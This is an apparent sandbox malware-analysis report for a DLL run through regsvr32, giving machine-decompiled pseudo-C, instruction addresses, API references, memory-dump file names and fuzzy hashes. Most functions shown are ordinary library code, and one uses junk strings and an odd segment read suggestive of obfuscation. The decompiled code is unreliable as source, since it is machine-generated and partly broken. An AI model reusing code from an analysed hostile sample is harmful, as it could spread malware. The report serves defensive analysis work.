								if(_t153 == 0) {
									goto L4;
								} else {
									do {
										_t31 = _t128 + 0x100388d8; // 0xfffffd3b
										 *((intOrPtr*)( *_t153 + 0x104))(_t155,  *_t31,  &_v36);
										if(_v28 != 0) {
											_t34 = _t128 + 0x100388dc; // 0x4
											_v104 = _v104 |  *_t34;
										}
										_t128 = _t128 + 8;
									} while (_t128 < 0x40);
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd40,  &_v36);
									_v100 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd43,  &_v36);
									_v96 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd34,  &_v36);
									_v84 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd3f,  &_v36);
									_v80 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd41,  &_v36);
									_t114 = _v28;
									_push( &_v92);
									_push(0x1003b2ec);
									_push(_t114);
									if( *((intOrPtr*)( *_t114))() < 0) {
										_v92 = _v92 & 0x00000000;
									}
									_t116 = _v16;
									_push( &_v60);
									_push( &_v124);
									_v60 = 0x18;
									_push(_t116);
									if( *((intOrPtr*)( *_t116 + 0xc))() >= 0) {
										 *((intOrPtr*)(_t155 + 0x70)) = _v56;
										 *((intOrPtr*)(_t155 + 0x60)) = _v48;
										 *((intOrPtr*)(_t155 + 0x64)) = _v44;
										_v20 = 1;
									}
									_t118 = _v16;
									 *((intOrPtr*)( *_t118 + 8))(_t118);
									_t120 = _v92;
									if(_t120 != 0) {
										 *((intOrPtr*)( *_t120 + 8))(_t120);
									}
									__imp__#9( &_v36);
									goto L19;
								}
							}
						}
					}
				} else {
					L4:
					_push(_t131);
					_v24 = 0x10044410;
					E100209E8( &_v24, 0x1003e2dc);
					asm("int3");
					_push(4);
					E1001FBC4(E10032E9B, _t128, _t153, _t155);
					_t132 = E100105C8(0x104);
					_v36 = _t132;
					_t90 = 0;
					_v24 = 0;
					if(_t132 != 0) {
						_t90 = E1000E58E(_t132);
					}
					return E1001FC9C(_t90);
				}
			}






































                                                                                                            0x1001615a
                                                                                                            0x1001615a
                                                                                                            0x10016161
                                                                                                            0x10016166
                                                                                                            0x10016168
                                                                                                            0x1001616d
                                                                                                            0x10016171
                                                                                                            0x10016176
                                                                                                            0x10016180
                                                                                                            0x10016181
                                                                                                            0x10016186
                                                                                                            0x10016189
                                                                                                            0x1001618b
                                                                                                            0x1001618c
                                                                                                            0x10016193
                                                                                                            0x10016308
                                                                                                            0x10016310
                                                                                                            0x10016199
                                                                                                            0x100161a3
                                                                                                            0x00000000
                                                                                                            0x100161a5
                                                                                                            0x100161ab
                                                                                                            0x100161b4
                                                                                                            0x100161bd
                                                                                                            0x100161c4
                                                                                                            0x100161cb
                                                                                                            0x100161ce
                                                                                                            0x100161d1
                                                                                                            0x100161d4
                                                                                                            0x100161d7
                                                                                                            0x100161dc
                                                                                                            0x100161e1
                                                                                                            0x100161e4
                                                                                                            0x00000000
                                                                                                            0x100161e6
                                                                                                            0x100161e6
                                                                                                            0x100161eb
                                                                                                            0x100161ee
                                                                                                            0x00000000
                                                                                                            0x100161f0
                                                                                                            0x100161f0
                                                                                                            0x100161f6
                                                                                                            0x100161ff
                                                                                                            0x1001620a
                                                                                                            0x1001620c
                                                                                                            0x10016212
                                                                                                            0x10016212
                                                                                                            0x10016215
                                                                                                            0x10016218
                                                                                                            0x1001622b
                                                                                                            0x1001623d
                                                                                                            0x10016245
                                                                                                            0x10016257
                                                                                                            0x1001625f
                                                                                                            0x10016272
                                                                                                            0x1001627a
                                                                                                            0x1001628c
                                                                                                            0x10016294
                                                                                                            0x1001629a
                                                                                                            0x100162a2
                                                                                                            0x100162a3
                                                                                                            0x100162a8
                                                                                                            0x100162ad
                                                                                                            0x100162af
                                                                                                            0x100162af
                                                                                                            0x100162b3
                                                                                                            0x100162b9
                                                                                                            0x100162bd
                                                                                                            0x100162be
                                                                                                            0x100162c7
                                                                                                            0x100162cd
                                                                                                            0x100162d2
                                                                                                            0x100162d8
                                                                                                            0x100162de
                                                                                                            0x100162e1
                                                                                                            0x100162e1
                                                                                                            0x100162e8
                                                                                                            0x100162ee
                                                                                                            0x100162f1
                                                                                                            0x100162f6
                                                                                                            0x100162fb
                                                                                                            0x100162fb
                                                                                                            0x10016302
                                                                                                            0x00000000
                                                                                                            0x10016302
                                                                                                            0x100161ee
                                                                                                            0x100161e4
                                                                                                            0x100161a3
                                                                                                            0x10016178
                                                                                                            0x10016178
                                                                                                            0x10004e71
                                                                                                            0x10004e7b
                                                                                                            0x10004e82
                                                                                                            0x10004e87
                                                                                                            0x10004e88
                                                                                                            0x10004e8f
                                                                                                            0x10004e9e
                                                                                                            0x10004ea0
                                                                                                            0x10004ea3
                                                                                                            0x10004ea7
                                                                                                            0x10004eaa
                                                                                                            0x10004eac
                                                                                                            0x10004eac
                                                                                                            0x10004eb6
                                                                                                            0x10004eb6

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog3
                                                                                                            • String ID: @
                                                                                                            • API String ID: 431132790-2766056989
                                                                                                            • Opcode ID: 1c91293a859d56314b42d59ec421a604b7eafc3955334380e555144e56ea7879
                                                                                                            • Instruction ID: a1e3f74af39593b6165eabf356290d244c81fe92429bd0fa7cefced01a7d7b0f
                                                                                                            • Opcode Fuzzy Hash: 1c91293a859d56314b42d59ec421a604b7eafc3955334380e555144e56ea7879
                                                                                                            • Instruction Fuzzy Hash: 3351B671A0021A9FDB04CFA8C8849EEB7F9FF48304F15456EE516EB251EB74A945CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000D09E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E1000D09E(void* __ebx, signed short __ecx, signed short* _a4) {
				signed int _v8;
				signed short _v12;
				signed short _v16;
				signed short _v20;
				signed short* _v48;
				void _v52;
				void* _v56;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t33;
				signed short _t34;
				long _t42;
				intOrPtr _t48;
				signed int _t50;
				signed short _t55;
				signed short* _t58;
				signed short* _t60;
				signed short* _t62;
				long _t63;
				void* _t64;

				_t49 = __ecx;
				_t47 = __ebx;
				_t58 = _a4;
				_t55 = __ecx;
				_v12 = __ecx;
				_v8 = 1;
				if(_t58 == 0) {
					L18:
					E1000B21C(_t47, _t49,  *(_t55 + 0x20), 0x364, 0, 0, 0, 0);
					L19:
					return _v8;
				}
				_push(__ebx);
				_t48 = __imp__SendDlgItemMessageA; // 0x747647e0
				while(1) {
					_t33 =  *_t58 & 0x0000ffff;
					if(_t33 == 0) {
						break;
					}
					_t60 =  &(_t58[1]);
					_t49 = _t33 & 0x0000ffff;
					_t34 =  *_t60 & 0x0000ffff;
					_t62 =  &(_t60[1]);
					_t54 =  *_t62;
					_t63 =  &(_t62[2]);
					_v16 = _t49;
					_v20 =  *_t62;
					if(_t34 == 0x1234) {
						L9:
						_t50 = 8;
						memset( &_v52, 0, _t50 << 2);
						_t64 = _t64 + 0xc;
						_v52 = _v52 | 0xffffffff;
						_push(_t63);
						_v56 = 1;
						E1000563B(_t48,  &_a4,  &_v52 + _t50, _t63, __eflags);
						_v48 = _a4;
						_t42 = SendDlgItemMessageA( *(_v12 + 0x20), _v16 & 0x0000ffff, 0x401, 0,  &_v56);
						__eflags = _t42 - 0xffffffff;
						if(_t42 == 0xffffffff) {
							_t18 =  &_v8;
							 *_t18 = _v8 & 0x00000000;
							__eflags =  *_t18;
						}
						_t49 =  &(_a4[0xfffffffffffffff8]);
						E10001260( &(_a4[0xfffffffffffffff8]), _t54);
						_t55 = _v12;
						L16:
						_t58 = _t63 + _v20;
						if(_v8 != 0) {
							continue;
						}
						break;
					}
					if(_t34 != 0x401) {
						__eflags = _t34 - 0x403;
						if(_t34 == 0x403) {
							_t34 = 0x143;
						}
						__eflags = _t34 - 0x401;
						if(__eflags != 0) {
							__eflags = _t34 - 0x180;
							if(__eflags == 0) {
								L14:
								if(SendDlgItemMessageA( *(_t55 + 0x20), _t49 & 0x0000ffff, _t34 & 0x0000ffff, 0, _t63) == 0xffffffff) {
									_v8 = _v8 & 0x00000000;
								}
								goto L16;
							}
							__eflags = _t34 - 0x143;
							if(__eflags != 0) {
								goto L16;
							}
							goto L14;
						} else {
							goto L9;
						}
					}
					_t34 = 0x180;
					goto L14;
				}
				_pop(_t47);
				if(_v8 == 0) {
					goto L19;
				}
				goto L18;
			}
























                                                                                                            0x1000d09e
                                                                                                            0x1000d09e
                                                                                                            0x1000d0a5
                                                                                                            0x1000d0ab
                                                                                                            0x1000d0ad
                                                                                                            0x1000d0b0
                                                                                                            0x1000d0b7
                                                                                                            0x1000d197
                                                                                                            0x1000d1a5
                                                                                                            0x1000d1aa
                                                                                                            0x1000d1b0
                                                                                                            0x1000d1b0
                                                                                                            0x1000d0bd
                                                                                                            0x1000d0be
                                                                                                            0x1000d0c4
                                                                                                            0x1000d0c4
                                                                                                            0x1000d0ca
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000d0d1
                                                                                                            0x1000d0d2
                                                                                                            0x1000d0d5
                                                                                                            0x1000d0d9
                                                                                                            0x1000d0da
                                                                                                            0x1000d0dc
                                                                                                            0x1000d0e3
                                                                                                            0x1000d0e6
                                                                                                            0x1000d0e9
                                                                                                            0x1000d109
                                                                                                            0x1000d10b
                                                                                                            0x1000d111
                                                                                                            0x1000d111
                                                                                                            0x1000d113
                                                                                                            0x1000d117
                                                                                                            0x1000d11b
                                                                                                            0x1000d122
                                                                                                            0x1000d12a
                                                                                                            0x1000d143
                                                                                                            0x1000d145
                                                                                                            0x1000d148
                                                                                                            0x1000d14a
                                                                                                            0x1000d14a
                                                                                                            0x1000d14a
                                                                                                            0x1000d14a
                                                                                                            0x1000d151
                                                                                                            0x1000d154
                                                                                                            0x1000d159
                                                                                                            0x1000d183
                                                                                                            0x1000d183
                                                                                                            0x1000d18a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000d18a
                                                                                                            0x1000d0ef
                                                                                                            0x1000d0f8
                                                                                                            0x1000d0fc
                                                                                                            0x1000d0fe
                                                                                                            0x1000d0fe
                                                                                                            0x1000d103
                                                                                                            0x1000d107
                                                                                                            0x1000d15e
                                                                                                            0x1000d162
                                                                                                            0x1000d16a
                                                                                                            0x1000d17d
                                                                                                            0x1000d17f
                                                                                                            0x1000d17f
                                                                                                            0x00000000
                                                                                                            0x1000d17d
                                                                                                            0x1000d164
                                                                                                            0x1000d168
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000d107
                                                                                                            0x1000d0f1
                                                                                                            0x00000000
                                                                                                            0x1000d0f1
                                                                                                            0x1000d194
                                                                                                            0x1000d195
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • SendDlgItemMessageA.USER32(?,?,00000401,00000000,00000001), ref: 1000D143
                                                                                                            • SendDlgItemMessageA.USER32(?,?,?,00000000,?), ref: 1000D178
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemMessageSend
                                                                                                            • String ID: Gvt
                                                                                                            • API String ID: 3015471070-1887957350
                                                                                                            • Opcode ID: 21e00d9c98aae06fdbb049b67d99c5e766e824e01a2932572a527c6a446a0d19
                                                                                                            • Instruction ID: 6f657181b73039fc70753d9552d04d4c2f3caec7d0b9dc05c1bc994beffb3f4d
                                                                                                            • Opcode Fuzzy Hash: 21e00d9c98aae06fdbb049b67d99c5e766e824e01a2932572a527c6a446a0d19
                                                                                                            • Instruction Fuzzy Hash: F1317E75900129BBEB10EF58C840BFDB7F8EB043A0F604216F995A71D8CBB49E429764
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000D08D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 92%
                                                                                                            			E1000D08D(signed short __ecx, void* __eflags, signed short* _a4) {
				signed int _v8;
				signed short _v12;
				signed short _v16;
				signed short _v20;
				signed short* _v48;
				void _v52;
				void* _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t35;
				signed short _t36;
				long _t44;
				void* _t49;
				intOrPtr _t50;
				signed int _t52;
				signed short _t58;
				signed short* _t63;
				signed short* _t66;
				signed short* _t68;
				long _t69;
				void* _t73;
				void* _t74;

				_t51 = __ecx;
				E100113EF(1);
				E100209E8(0, 0);
				asm("int3");
				_t74 = _t73 - 0x34;
				_t63 = _a4;
				_t58 = _t51;
				_v12 = _t58;
				_v8 = 1;
				if(_t63 == 0) {
					L19:
					E1000B21C(_t49, _t51,  *(_t58 + 0x20), 0x364, 0, 0, 0, 0);
				} else {
					_push(_t49);
					_t50 = __imp__SendDlgItemMessageA; // 0x747647e0
					while(1) {
						_t35 =  *_t63 & 0x0000ffff;
						if(_t35 == 0) {
							break;
						}
						_t66 =  &(_t63[1]);
						_t51 = _t35 & 0x0000ffff;
						_t36 =  *_t66 & 0x0000ffff;
						_t68 =  &(_t66[1]);
						_t56 =  *_t68;
						_t69 =  &(_t68[2]);
						_v16 = _t51;
						_v20 =  *_t68;
						if(_t36 == 0x1234) {
							L10:
							_t52 = 8;
							memset( &_v52, 0, _t52 << 2);
							_t74 = _t74 + 0xc;
							_v52 = _v52 | 0xffffffff;
							_push(_t69);
							_v56 = 1;
							E1000563B(_t50,  &_a4,  &_v52 + _t52, _t69, __eflags);
							_v48 = _a4;
							_t44 = SendDlgItemMessageA( *(_v12 + 0x20), _v16 & 0x0000ffff, 0x401, 0,  &_v56);
							__eflags = _t44 - 0xffffffff;
							if(_t44 == 0xffffffff) {
								_t18 =  &_v8;
								 *_t18 = _v8 & 0x00000000;
								__eflags =  *_t18;
							}
							_t51 =  &(_a4[0xfffffffffffffff8]);
							E10001260( &(_a4[0xfffffffffffffff8]), _t56);
							_t58 = _v12;
						} else {
							if(_t36 != 0x401) {
								__eflags = _t36 - 0x403;
								if(_t36 == 0x403) {
									_t36 = 0x143;
								}
								__eflags = _t36 - 0x401;
								if(__eflags != 0) {
									__eflags = _t36 - 0x180;
									if(__eflags == 0) {
										goto L15;
									} else {
										__eflags = _t36 - 0x143;
										if(__eflags == 0) {
											goto L15;
										}
									}
								} else {
									goto L10;
								}
							} else {
								_t36 = 0x180;
								L15:
								if(SendDlgItemMessageA( *(_t58 + 0x20), _t51 & 0x0000ffff, _t36 & 0x0000ffff, 0, _t69) == 0xffffffff) {
									_v8 = _v8 & 0x00000000;
								}
							}
						}
						_t63 = _t69 + _v20;
						if(_v8 != 0) {
							continue;
						}
						break;
					}
					_pop(_t49);
					if(_v8 != 0) {
						goto L19;
					}
				}
				return _v8;
			}



























                                                                                                            0x1000d08d
                                                                                                            0x1000d08f
                                                                                                            0x1000d098
                                                                                                            0x1000d09d
                                                                                                            0x1000d0a1
                                                                                                            0x1000d0a5
                                                                                                            0x1000d0ab
                                                                                                            0x1000d0ad
                                                                                                            0x1000d0b0
                                                                                                            0x1000d0b7
                                                                                                            0x1000d197
                                                                                                            0x1000d1a5
                                                                                                            0x1000d0bd
                                                                                                            0x1000d0bd
                                                                                                            0x1000d0be
                                                                                                            0x1000d0c4
                                                                                                            0x1000d0c4
                                                                                                            0x1000d0ca
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000d0d1
                                                                                                            0x1000d0d2
                                                                                                            0x1000d0d5
                                                                                                            0x1000d0d9
                                                                                                            0x1000d0da
                                                                                                            0x1000d0dc
                                                                                                            0x1000d0e3
                                                                                                            0x1000d0e6
                                                                                                            0x1000d0e9
                                                                                                            0x1000d109
                                                                                                            0x1000d10b
                                                                                                            0x1000d111
                                                                                                            0x1000d111
                                                                                                            0x1000d113
                                                                                                            0x1000d117
                                                                                                            0x1000d11b
                                                                                                            0x1000d122
                                                                                                            0x1000d12a
                                                                                                            0x1000d143
                                                                                                            0x1000d145
                                                                                                            0x1000d148
                                                                                                            0x1000d14a
                                                                                                            0x1000d14a
                                                                                                            0x1000d14a
                                                                                                            0x1000d14a
                                                                                                            0x1000d151
                                                                                                            0x1000d154
                                                                                                            0x1000d159
                                                                                                            0x1000d0eb
                                                                                                            0x1000d0ef
                                                                                                            0x1000d0f8
                                                                                                            0x1000d0fc
                                                                                                            0x1000d0fe
                                                                                                            0x1000d0fe
                                                                                                            0x1000d103
                                                                                                            0x1000d107
                                                                                                            0x1000d15e
                                                                                                            0x1000d162
                                                                                                            0x00000000
                                                                                                            0x1000d164
                                                                                                            0x1000d164
                                                                                                            0x1000d168
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000d168
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000d0f1
                                                                                                            0x1000d0f1
                                                                                                            0x1000d16a
                                                                                                            0x1000d17d
                                                                                                            0x1000d17f
                                                                                                            0x1000d17f
                                                                                                            0x1000d17d
                                                                                                            0x1000d0ef
                                                                                                            0x1000d183
                                                                                                            0x1000d18a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000d18a
                                                                                                            0x1000d194
                                                                                                            0x1000d195
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000d195
                                                                                                            0x1000d1b0

                                                                                                            APIs
                                                                                                              • Part of subcall function 100113EF: LeaveCriticalSection.KERNEL32(?,1001068C,00000010,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 10011406
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 1000D098
                                                                                                              • Part of subcall function 100209E8: RaiseException.KERNEL32(1000511C,?,1000103F,8007000E,1000511C,?,1003E34C,00000004,1000103F,8007000E,100010E9), ref: 10020A28
                                                                                                            • SendDlgItemMessageA.USER32(?,?,00000401,00000000,00000001), ref: 1000D143
                                                                                                            • SendDlgItemMessageA.USER32(?,?,?,00000000,?), ref: 1000D178
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemMessageSend$CriticalExceptionException@8LeaveRaiseSectionThrow
                                                                                                            • String ID: Gvt
                                                                                                            • API String ID: 1466613979-1887957350
                                                                                                            • Opcode ID: fb879166e7deffb256b3134b359da8dd9ea36f46a71b4b84f91a4bb831ca918e
                                                                                                            • Instruction ID: f528238557d930c5b01bcb6272fa04cb0a70709c9dc2ae90bee456ea62ca2b20
                                                                                                            • Opcode Fuzzy Hash: fb879166e7deffb256b3134b359da8dd9ea36f46a71b4b84f91a4bb831ca918e
                                                                                                            • Instruction Fuzzy Hash: 82119D75900224BBFB10EB58CC40BFEB3E8EB047A1F204116FD95A71D4C6B49E4196A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100061E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 76%
                                                                                                            			E100061E5(void* __ecx) {
				signed int _v8;
				char _v16;
				char _v18;
				char _v280;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				long _t14;
				intOrPtr _t15;
				char* _t18;
				intOrPtr _t21;
				intOrPtr _t33;
				signed int _t36;

				_t11 =  *0x10045580; // 0x8f64cb61
				_v8 = _t11 ^ _t36;
				_t35 = 0x104;
				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
				if(_t14 == 0 || _t14 == 0x104) {
					L4:
					_t15 = 0;
					__eflags = 0;
				} else {
					_t18 = PathFindExtensionA( &_v280);
					_t35 = "%s.dll";
					asm("movsd");
					asm("movsw");
					_t32 =  &_v280;
					_t41 = _t18 -  &_v280 + 7 - 0x106;
					asm("movsb");
					_t33 = _t33;
					if(_t18 -  &_v280 + 7 > 0x106) {
						goto L4;
					} else {
						E10005C93(_t21,  &_v280, _t33, "%s.dll", _t36, _t18,  &_v18 - _t18,  &_v16);
						_t15 = E10005EFE(_t21,  &_v280, _t33, "%s.dll", _t41,  &_v280);
					}
				}
				return E1001FBB5(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
			}

















                                                                                                            0x100061ee
                                                                                                            0x100061f5
                                                                                                            0x100061fb
                                                                                                            0x1000620b
                                                                                                            0x10006213
                                                                                                            0x1000626a
                                                                                                            0x1000626a
                                                                                                            0x1000626a
                                                                                                            0x10006219
                                                                                                            0x10006221
                                                                                                            0x10006227
                                                                                                            0x1000622f
                                                                                                            0x10006230
                                                                                                            0x10006234
                                                                                                            0x1000623f
                                                                                                            0x10006245
                                                                                                            0x10006246
                                                                                                            0x10006247
                                                                                                            0x00000000
                                                                                                            0x10006249
                                                                                                            0x10006254
                                                                                                            0x10006263
                                                                                                            0x10006263
                                                                                                            0x10006247
                                                                                                            0x10006278

                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 1000620B
                                                                                                            • PathFindExtensionA.SHLWAPI(?), ref: 10006221
                                                                                                              • Part of subcall function 10005C93: _strcpy_s.LIBCMT ref: 10005C9F
                                                                                                              • Part of subcall function 10005EFE: __EH_prolog3.LIBCMT ref: 10005F1D
                                                                                                              • Part of subcall function 10005EFE: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10005F3E
                                                                                                              • Part of subcall function 10005EFE: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10005F4F
                                                                                                              • Part of subcall function 10005EFE: ConvertDefaultLocale.KERNEL32(?), ref: 10005F85
                                                                                                              • Part of subcall function 10005EFE: ConvertDefaultLocale.KERNEL32(?), ref: 10005F8D
                                                                                                              • Part of subcall function 10005EFE: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10005FA1
                                                                                                              • Part of subcall function 10005EFE: ConvertDefaultLocale.KERNEL32(?), ref: 10005FC5
                                                                                                              • Part of subcall function 10005EFE: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10005FCB
                                                                                                              • Part of subcall function 10005EFE: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10006004
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                            • String ID: %s.dll
                                                                                                            • API String ID: 3444012488-3668843792
                                                                                                            • Opcode ID: ac138f1077deb34d125d2171bae05d8dd1b3139321e2d582d898c2537ca73f46
                                                                                                            • Instruction ID: 87bbfe94c284bf79419f18a095101e7eadcc839ae2e31c05850216e2d59394d5
                                                                                                            • Opcode Fuzzy Hash: ac138f1077deb34d125d2171bae05d8dd1b3139321e2d582d898c2537ca73f46
                                                                                                            • Instruction Fuzzy Hash: A001F972A0051C6FEB19DB74CD569EE73B9EF08740F0101A9F502E7144EA71AE048751
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100014F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100014F4(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;

				_v12 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + 0x30;
				_v8 =  *[fs:ebx];
				return _v8;
			}





                                                                                                            0x10001522
                                                                                                            0x1000152b
                                                                                                            0x10001533

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001512
                                                                                                            Strings
                                                                                                            • xadqsavcbdfewescGADW, xrefs: 100014FF
                                                                                                            • eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001506
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
